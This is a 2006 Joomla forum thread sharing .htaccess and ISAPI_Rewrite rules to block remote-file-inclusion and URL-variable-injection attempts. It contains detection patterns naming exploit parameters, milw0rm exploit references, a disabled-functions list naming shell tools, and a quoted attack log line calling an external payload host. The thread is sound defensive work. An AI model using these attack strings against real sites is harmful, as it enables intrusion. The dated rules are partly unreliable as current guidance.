Discussion for: Using .htaccess files to block exploit attempts

random · **Joined:** Sat Sep 24, 2005 5:47 pm **Posts:** 221

RobS wrote:

While we are on that subject, in case you don't know, many components have folders in the /path/to/joomla/components/ directory and /path/to/joomla/administrator/components/. It is possible for components that suffer from this type of vulnerability to be exploited through the back-end so make sure you drop a php.ini file in those directories as well.

Do you mean to drop one in every subfolder? There are many folders, can it just be dropped in the components folders of admin and Joomla components?

BTW, can I toss out tinymce? I have JCE and I prefer not having to upload tinymce again as it is a pain in Joomla installs and patches.

TIA

josoroma · **Joined:** Sun Sep 11, 2005 12:59 am **Posts:** 81

josoroma wrote:

# Possible attacks
cat /var/log/httpd/access_log* | egrep -i -f patterns.txt | sort | uniq

# Unique quantity of IP's
cat /var/log/httpd/access_log* | egrep -i -f patterns.txt | awk '{print $1}' | uniq | sort | wc -l

# IP:
cat /var/log/httpd/access_log* | egrep -i -f patterns.txt | awk '{print $1}' | sort | uniq

# URL:
cat /var/log/httpd/access_log* | egrep -i -f patterns.txt | awk '{print $7}' | sort | uniq

# IP and URL:
cat /var/log/httpd/access_log* | egrep -i -f patterns.txt | awk '{print "[", $1, "]", $7}' | sort | uniq

# Who:
cat /var/log/httpd/access_log* | egrep -i -f patterns.txt | awk '{print $1}' | sort | uniq | xargs -n 1 host

I was thinkink some kind of shell script using cron(each hour) to send an email to the administrator if "wc -l" > 1 and if log date line is equal to today. Any help is welcome with the construction of this script.

#1
I know about acces log, which other log files need to be audited?

#2
Which will be the future of joomla 1.0x security fixes after the launch of joomla 1.5?

Thanx.

RobS · **Posted:** Sun Jul 23, 2006 7:23 pm

Joomla 1.0.x is going to continue to be maintained for a so far undecided amount of time. Approximately 6 months to 1 year. This should give everyone adequate amount of time to get their add-ons etc ready for 1.5 if they haven't done so already.

crash777 · **Posted:** Mon Jul 24, 2006 8:43 pm

Is there a way to set my htaccess template globally or do I have to go into EVERY directory and change each htaccess file to include this code?

RobS · **Posted:** Mon Jul 24, 2006 10:48 pm

.htaccess files work recursively. Anything included in an .htaccess file in your public html folder will apply to all subfolders as well.

rkleemann · **Joined:** Wed Jan 04, 2006 10:02 pm **Posts:** 25

HELP...!

I've put in RobS's suggested .htaccess file, and it seems to work fine.

However, the login module no longer works. I get the 403 Forbidden when I try to login.

I don't see anything in comprofile.php relative to login that would trigger the 403, so I wonder what could be the problem?

Thanks
Ricardo

RobS · **Posted:** Tue Jul 25, 2006 3:52 pm

Oh, that is the first report I have heard of something breaking. The way to figure it out I suppose would be to go through one at a time and comment out each line that starts with 'RewriteCond' in the list of rules I gave. Just put a '#' as the first character of the line. Once you figure out which Rewrite Condition is causing the problem let me know and we will go from there.

rkleemann · **Joined:** Wed Jan 04, 2006 10:02 pm **Posts:** 25

This is crazy...

I've removed my .htaccess file and I'm still getting the 403 !!! How can that be? :'(

A login attempt sends me to /index.php with a 403 error. I can't figure out how this is happening.

I don't have any rewrite rules in the apache config file. I've removed the .htaccess file.

RobS · **Posted:** Tue Jul 25, 2006 4:13 pm

I suggest you contact your hosting provider. They should be able to quickly diagnose and solve that.

rkleemann · **Joined:** Wed Jan 04, 2006 10:02 pm **Posts:** 25

I am the one diagnosing it... :(

I am in control of apache. I see in the access log

POST /index.php?option=com_comprofiler&task=loing HTTP/1.1" 200 42111
POST /index.php HTTP/1.1" 403 118

But the .htaccess isn't there!

I thought perhaps this is some crazy NFS issue, since the server has NFS mounted. But logged in, the .htaccess file isn't there. I've restarted apache twice already thinking maybe it had something cached. I've unmounted and re-mounted the nfs partition and I restarted the nfs server.

But I still get the error.

I don't understand what could possibly be wrong. How can I trace this 403 error?

I put some debug into the main index.php to try and see what's going on, and it seems the 403 is coming from

$mainframe->login();

because if I put an alert prior to that call, I see it. If I put an alert after that call, I get the 403

RobS · **Posted:** Tue Jul 25, 2006 5:10 pm

go to your htdocs folder or wherever your configuration.php file is and do this.

# find . -name ".htaccess" -print

If there is an .htaccess around that is causing problems that will show you where it is.

rkleemann · **Joined:** Wed Jan 04, 2006 10:02 pm **Posts:** 25

Nope,

I found the problem, although I'm not sure what the best solution is.

In includes/joomla.php there are 2 functions:

josSpoofCheck and josSpoofValue

josSpoofCheck calls josSpoofValue that validates a certain parameter. The $validate in josSpoofValue is a hash of a value, and it is a non-zero value. However, when it returns the $validate variable to josSpoofCheck, that value is getting clobbered somehow, and is returned as a 0 to josSpoofCheck. That forces an immediate call to

header('HTTP/1.0 403 Forbidden);

If I take the if block that checks $validate and put it at the end of josSpoofValue, then all works fine. If I put it back inside josSpoofCheck, then the login doesn't work because the $validate value somehow gets set to 0. I don't understand how, it's simply being returned in the stack and I checked its value immediately prior to the return.

Sounds like some sort of bug with PHP...?

krbmedia · **Joined:** Sun Oct 23, 2005 6:29 pm **Posts:** 6

infograf768 wrote:

@vscribe

errot in your text
It is:

Quote:

RewriteRule ^(.*)$ index.php [F,L]

Is this instead of the following line already there?

RewriteRule ^(.*) index.php

Christian_S · **Posted:** Fri Jul 28, 2006 6:06 pm

Like krbmedia I'm struggeling a bit with these .htaccess rules as well.

Is it possible to define several RewriteRule's in the file, like this?

Code:

# Rule
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*) index.php

# extra rule
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
RewriteRule ^(.*)$ index.php [F,L]

Secondly if I want to blockout any url/link to my site containing "phpbb_root_path=" then how do I go about that?
I have tried to add this condition, but it does not seem to have affect at all.

Code:

RewriteCond %{QUERY_STRING} phpbb_root_path(=|\%3D|%[0-9A-Z]{0,2}) [OR]

The idea with above would be that links like this
http://site.com/components/com_forum/fo ... _path=test
would to go to 403 forbidden

Currently my .htaccess file looks like this

Code:

##
# @version $Id: htaccess.txt,v 1.5 2005/01/22 23:00:27 spacemonkey Exp $
# @package Mambo
# @copyright (C) 2000 - 2005 Miro International Pty Ltd
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Mambo is Free Software
##

#
#  mod_rewrite in use
#

RewriteEngine On

#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update YourMamboDirectory (just / for root)

# RewriteBase /YourMamboDirectory

#
#  Rules
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d

RewriteRule ^(.*) index.php


########## Begin - Rewrite rules to block out some common exploits
#                              
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script that tries to set CONFIG_EXT (com_extcal2 issue)
RewriteCond %{QUERY_STRING} CONFIG_EXT(\[|\%20|\%5B).*= [NC,OR]
# Block out any script that tries to set sbp or sb_authorname via URL (simpleboard)  
RewriteCond %{QUERY_STRING} sbp(=|\%20|\%3D) [OR]
RewriteCond %{QUERY_STRING} sb_authorname(=|\%20|\%3D)     
#
# 
# Block phpbb component exploit
RewriteCond %{QUERY_STRING} phpbb_root_path(=|\%3D|%[0-9A-Z]{0,2}) [OR]
#
#
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits



# $Id: htaccess addition v 0.001 Marcus W $
#
# htaccess file for handling big files in Mambo
#
# @ Released under any license...
# @version $Revision: 0.001 $
#
# More Rules
#
php_value max_execution_time 3000
php_value upload_max_filesize 32M
php_value post_max_size 32M
php_value memory_limit 32M

php_value register_globals off

But I have not been able to verify if the latter part of the rewriterules actually works as intended. So far it seems to me like they have no effect.

If I remove the first rewrite condition and rule then any pages in sections or categories does not load, instead I get 404 error. So I'm guessing they should stay there.

Well any general comments on the .htaccess syntax in terms of how to add several ruls would be helpful and hints to how the block urls like something.php?phpbb_root_path=something_else.txt would be greatly appreciated.
- Chr

Christian_S · **Posted:** Fri Jul 28, 2006 6:15 pm

aha - now I got it. The last [OR] was in the wrong position, so moving it upwards to the 2nd last line solved my problem, like so:

Code:

...
RewriteCond %{QUERY_STRING} sbp(=|\%20|\%3D) [OR]
RewriteCond %{QUERY_STRING} sb_authorname(=|\%20|\%3D)  [OR]
#
# Block phpbb component exploit
RewriteCond %{QUERY_STRING} phpbb_root_path(=|\%3D|%[0-9A-Z]{0,2}) 
#
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

dweeble · **Joined:** Sun Jan 08, 2006 9:21 pm **Posts:** 2

Here is something I picked up on the topic,

Stopping bad bots raiding your website has become an issue. Bad bots ignore
your robots.txt rules, can greatly increase your bandwidth usage, throw your
stats into confusion and often harvest email addresses. By upload an
.htaccess file with the following contents you can stop named bots from accessing
your website. Add further names if required. Note: 208.66.195.0-28 refers to the
Moscow-based Psychelone agent that has recently appeared and that does not
always disclose its identity...

SetEnvIfNoCase User-agent "Arellis" spammer=yes
SetEnvIfNoCase User-agent "Indy Library" spammer=yes
SetEnvIfNoCase User-agent "psycheclone" spammer=yes
SetEnvIfNoCase User-agent "Xenu_Link_Sleuth" spammer=yes
SetEnvIfNoCase User-agent "Zeus_" spammer=yes

Order allow,deny
deny from env=spammer
allow from all

deny from 208.66.195.0/28

Only the directives can live between the tags; anything you want to block
must live below the endTag it seems.

Elpie · **Joined:** Wed Aug 17, 2005 11:26 pm **Posts:** 869

dweeble wrote:

Note: 208.66.195.0-28 refers to the
Moscow-based Psychelone agent that has recently appeared and that does not
always disclose its identity...

"psycheclone" has appeared on a number of sites, coincidentally just before those sites were hacked.
Due to the very large number of "coincidences" a number of hosts are now blocking this bot at firewall level from their servers.

I strongly recommend that everyone adds the following to their .htaccess file to keep that bot out. It has no legitimate purpose and although nobody seems to have proof that it is related to exploits, it does appear to deep-scan sites not long before sites are hit.

@dweeble - you give one IP for this bot, but it changes IP's frequently and often within the one session.

This is the IP block to block in .htaccess:

Code:

deny from 208.66.195.0/28

Remember, an error in your .htaccess file can make your server space unaccessible to even you! Also note that every directive you add to .htaccess increases server load and may decrease your site's performance.

Brandito · **Joined:** Tue Aug 01, 2006 4:28 am **Posts:** 49

If I contact my webhost (1and1) and they turn off RG, server wide, do I still need to use this code in my .htaccess file?

Code:

########## Begin - Rewrite rules to block out some common exploits
#                              
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
# 
########## End - Rewrite rules to block out some common exploits

Brandito · **Joined:** Tue Aug 01, 2006 4:28 am **Posts:** 49

Ok I checked with 1and1. My "Server API" is "CGI". And registerd globals are on.

I changed:

Code:

/**
 * Use 1 to emulate register_globals = on
 * 
 * Use 0 to emulate regsiter_globals = off
 */
define( 'RG_EMULATION', 1 );

To:

Code:

/**
 * Use 1 to emulate register_globals = on
 * 
 * Use 0 to emulate regsiter_globals = off
 */
define( 'RG_EMULATION', 0 );

But it did not affect the RG, it is still turned on. I have also tried using a "php.ini" file, but it had no affect, with the coding:

Code:

-------------snip-------------
php_value register_globals off
disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open
-------------snap-------------

Any thoughts or suggestions, would be greatly appreciated. I am trying to setup a E-commerce website, so I need to make sure I get my site as secure as possible.

Here are my server stats:
I am using PHP 4.4.2.
My web server is Apache/1.3.37 (Unix). Note that I am on a shared hosting package, I do not have a dedicated server.
My WebServer to PHP interface is CGI.

Thanks, Brandon.

Elpie · **Joined:** Wed Aug 17, 2005 11:26 pm **Posts:** 869

Hi Brandon,
Hosts set up servers differently. .htaccess will not work for you as your server is running PHP under cgi. php.ini *should* work, but again this is dependent on how your host has set up the server. You will need to contact your host, tell them you want register_globals off and ask them to do it. If they won't do it server-wide, then ask them to give you the appropriate settings for a php.ini. If they won't allow you to set register_globals off for your own site then you might like to consider changing hosts.

Digiover · **Joined:** Wed Aug 02, 2006 12:27 pm **Posts:** 2

RobS wrote:

I take it you are using IIS? The script has had 0 testing with IIS and I am not even sure IIS has a mod_rewrite clone. As far as I am aware, you cannot use either SEF or those mod_rewrite rules for your website.

Use ISAPI_Rewrite for IIS, for example with rules like:

Code:

[ISAPI_Rewrite]
# XSS exploits
#
# http://www.milw0rm.com/exploits/1981
RewriteRule .*(?:mosConfig_absolute_path\=http(\://|%3A%2F%2F).*cmd\.(txt|gif)).* / [F,I,L]
# http://milw0rm.com/exploits/1994
RewriteRule .*(?:com_simpleboard\/image_upload\.php\?sbp\=http(\://|%3A%2F%2F).*cmd\.(txt|gif)).* / [F,I,L]
# http://www.milw0rm.com/exploits/1995
RewriteRule .*(?:com_forum\/download\.php\?phpbb_root_path\=).* / [F,I,L]
# http://www.milw0rm.com/exploits/1723
RewriteRule .*(?:\/admin\/addentry\.php\?phpbb_root_path\=http(\://|%3A%2F%2F).*\?).* / [F,I,L]
# http://www.milw0rm.com/exploits/1808
RewriteRule .*(?:\?ROOT_PATH=http(\://|%3A%2F%2F).*cmd\.(txt|gif)).* / [F,I,L]
# http://www.milw0rm.org/exploits/2085
RewriteRule .*(?:com_colophon\/admin\.colophon\.php\?mosConfig_absolute_path\=http(\://|%3A%2F%2F)).* / [F,I,L]
# http://www.milw0rm.org/exploits/2086
RewriteRule .*(?:com_mambatstaff\/mambatstaff\.php\?mosConfig_absolute_path\=http(\://|%3A%2F%2F)).* / [F,I,L]
# http://www.milw0rm.org/exploits/2089
RewriteRule .*(?:com_uhp\/(uhp_config\.php|footer\.php|functions\.php|install\.uhp\.php|toolbar\.uhp\.html\.php|uhp\.class\.php|uninstall\.uhp\.php)\?mosConfig_absolute_path\=http(\://|%3A%2F%2F)).* / [F,I,L]
# smf.php exploit
RewriteRule .*(?:com_smf\/smf\.php\?mosConfig_absolute_path\=http(\://|%3A%2F%2F)).* / [F,I,L]

It is not perfect, rules can be rewritten to be shorter and/or to block more, but it works. Only disadvantage is that the 'F" (Forbidden) flag returns a 404 File Not Found, not a 403 Access Forbidden.

Brandito · **Joined:** Tue Aug 01, 2006 4:28 am **Posts:** 49

Elpie wrote:

Hi Brandon,
Hosts set up servers differently. .htaccess will not work for you as your server is running PHP under cgi. php.ini *should* work, but again this is dependent on how your host has set up the server. You will need to contact your host, tell them you want register_globals off and ask them to do it. If they won't do it server-wide, then ask them to give you the appropriate settings for a php.ini. If they won't allow you to set register_globals off for your own site then you might like to consider changing hosts.

Hey Elpie, thanks for the quick response.

Ok, I will contact them again. I asked them to turn them off last time I was talking to them. But all they did was send me information about how to view my PHP stats. So if they will not, and I cant. Are you familiar with a Webhost that I can turn off RG's with? Also since your suggesting that I switch webhosts if they wont turn off registerd globals, I assume that it is very important to turn them off?

Brandon.

DeanMarshall · **Posted:** Sat Aug 05, 2006 1:24 am

Brandon,

For the change to work with 1and1 they require the php.ini to be in each and every folder that has executable scripts in it - the settings don't cascade or inherit. I discovered this when I set register globals off in the joomla folder but the system info in the /administrator/ section stubbornly refused to be disables.

Dean

tyler · **Posted:** Sat Aug 05, 2006 11:57 am

Rob, I just want to say to you and all those contributing to this .htaccess protection measure, thank you very much.

This does so much in fending off potentially small and big exploits! It is a great added line of defense, and I am highly appreciative of how targeted you have made the code so that it does not interfere with legitimate functionality as far as I can tell.

I've got a question though. If I have a set of RewriteCond's and a RewriteRule already in my .htaccess file, will I just be able to append this block to the end of my file with no conflicts or inefficiencies from those other RewriteCond's and RewriteRule that are already there?

This is what I had at the end of my .htaccess file already:

Code:

########## Begin 3rd Party or Core SEF Section
#
RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
RewriteCond %{REQUEST_URI} (/|\.htm|\.php|\.html|/[^.]*)$  [NC]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule (.*) index.php
#
########## End 3rd Party or Core SEF Section

I'm just curious if having two RewriteRule's might slow the server down when responding to some of the conditions. Seems mine might be doing that for some induced 404 errors, but then again I haven't had much sleep lately

RobS · **Posted:** Sat Aug 05, 2006 6:09 pm

Tyler,

No, there shouldn't be any conflicts. I know of many people using the rules I wrote and various SEF components which need the block of conditions you posted. The only problem that could arise is from trying to use another RewriteRule that has an [L] tag in it while expecting another rule to be parsed. The [L] tag specifies that mod_rewrite should stop checking rules after this rule (stands for Last) which my rule includes in order to force the 403 Forbidden error. None of the SEF functions should use this tag so everything should be okay. One thing that might be causing 404 errors for you is if you have that last rewrite rule block in your .htaccess file and you DO NOT have any SEF functionality enabled. So, make sure you have SEF enabled in your sites core configuration or comment out those rules by placing a '#' sign at the beginning of the line. Use the comments in that block as an example if you need clarification.

tyler · **Posted:** Sat Aug 05, 2006 10:14 pm

Yeah, thx Rob... good explanations there

I'll be keepin SEF on the whole time, but I'll now know what to do if I disable it

tyler · **Posted:** Mon Aug 14, 2006 4:15 am

I saw a hack done where there seemed to be a GET request in the query string:

Here is the error log message;

Quote:

62.149.0.117 - - [14/Aug/2006:00:48:38 +0700] "GET /myweb/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://t3ch.addyour.net/ox.dat? HTTP/1.1" 404 266 "-" "libwww-perl/5.63"

I'm curious if this error log indicator above is a query string type of attack and I'm more interested if anyone can provide a suggested line for me to add to my existing version of the Joomla .htaccess (which also happens to be exactly the same as the recommended secured version that this thread discusses).

Would this be a good line for me to add in order to strengthen my security againt that type of attack?:

Quote:

RewriteCond %{QUERY_STRING} GET and components or modules or mambots or templates [OR]

I realize the statement itself is probably wrong, but how should the .htaccess code look so that I rewrite any GET string that has any of those other terms with it (components or modules or mambots or templates)?

This might not be candidate for the joomla recommended .htaccess cuz some people may have valid uses for such a query string, but I know that none of the URLs on my site will ever have GET in a query string with those other terms.

Also, for a query string attack like that, does the GET have to be case sensitive, plus in the existing recommended .htaccess rewrite rules are the query terms being evaluated as case sensitive?

RobS · **Posted:** Mon Aug 14, 2006 7:23 am

tyler wrote:

I saw a hack done where there seemed to be a GET request in the query string:

Here is the error log message;

Quote:

62.149.0.117 - - [14/Aug/2006:00:48:38 +0700] "GET /myweb/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://t3ch.addyour.net/ox.dat? HTTP/1.1" 404 266 "-" "libwww-perl/5.63"

I'm curious if this error log indicator above is a query string type of attack and I'm more interested if anyone can provide a suggested line for me to add to my existing version of the Joomla .htaccess (which also happens to be exactly the same as the recommended secured version that this thread discusses).

Would this be a good line for me to add in order to strengthen my security againt that type of attack?:

Quote:

RewriteCond %{QUERY_STRING} GET and components or modules or mambots or templates [OR]

I realize the statement itself is probably wrong, but how should the .htaccess code look so that I rewrite any GET string that has any of those other terms with it (components or modules or mambots or templates)?

This might not be candidate for the joomla recommended .htaccess cuz some people may have valid uses for such a query string, but I know that none of the URLs on my site will ever have GET in a query string with those other terms.

Also, for a query string attack like that, does the GET have to be case sensitive, plus in the existing recommended .htaccess rewrite rules are the query terms being evaluated as case sensitive?

Well, to be blunt, you are way off.

First of all, GET is part of the HTTP request header and would be addressed with mod_rewrite by the {REQUEST_URI} field not the {QUERY_STRING} feild. The query string is the part after the question mark '?'. In your example it would be "component_dir=http://t3ch.addyour.net/ox.dat."

Furthermore, you cannot block access to components, templates, modules, or mambots completely without breaking a lot of functionality of your site. For example, you won't be able to load any images that are part of your template, you won't be able to do anything that requires javascript (which is anything related to adding or editing content). You won't be able to use any component or module that has its own javascript or stylesheet files. I have tested this idea before, it doesn't work like you think it will.

What you want is something like this:

Code:

# Block out any script trying to set component_dir value through the URL
RewriteCond %{QUERY_STRING} component_dir(=|\%3D) [NC,OR]

Which if you are using the other mod_rewrite rules that I provided should go right above the last RewriteCond ... statement and its related comment to look something like this:

Code:

...
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to set component_dir value through the URL
RewriteCond %{QUERY_STRING} component_dir(=|\%3D) [NC,OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
...

Lastly, this is not a real solution to preventing com_webring from getting hacked. It will only block that specific attack and considering com_webring has been abandoned for a long time you should definitely remove it and find something else to replace it as the chances for a proper patch and security audit being done on the component are almost nonexistant.

Hope that helps.

tyler · **Posted:** Mon Aug 14, 2006 7:49 am

thx Rob, I don't have com_webring thankfully, but the explanation about the GET header and the clarification about the query string made me realize that I don't need to implement an .htaccess rule for just that one single exploit.

For some silly reason, I mis-interpreted that the GET command might be thrown in thru the querystring (which is not the case), so I'm not so worried about those type of exploits.

Would've only wanted to block components & modules verbiage in the query string line ONLY if it was vulnerable to hack in combination with a GET threat that occured thru the query string (which as you explained does not happen that way).

thanks for the thorough explanations

RobS · **Posted:** Mon Aug 14, 2006 7:52 am

You're welcome

As always, I am glad I could help people lock down their sites (or provide them with more knowledge how to) but I want to make sure they are following best practices in doing so...

Joomla! Discussion Forums

Forum rules

Discussion for: Using .htaccess files to block exploit attempts

Quick reply

Who is online